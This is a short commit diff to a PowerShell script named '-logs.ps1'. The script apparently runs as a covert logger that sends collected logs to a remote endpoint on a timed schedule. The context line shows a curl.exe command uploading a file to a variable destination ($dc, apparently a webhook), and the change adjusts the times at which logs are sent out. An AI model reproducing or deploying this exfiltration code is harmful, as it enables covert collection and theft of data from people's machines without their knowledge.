Update -logs.ps1

This commit is contained in:
I-Am-Jakoby 2022-12-24 00:32:03 -06:00 committed by GitHub
parent e22e18cc91
commit 74cdae15d9
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -30,10 +30,10 @@ if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $dc}
# times logs will be sent [keep in military time]
$logTimes = @(
'00:30:00',
'00:30:15',
'00:30:30',
'00:30:45',
'00:36:00',
'00:36:15',
'00:36:30',
'00:36:45',
'04:00:00',
'05:00:00',
'06:00:00',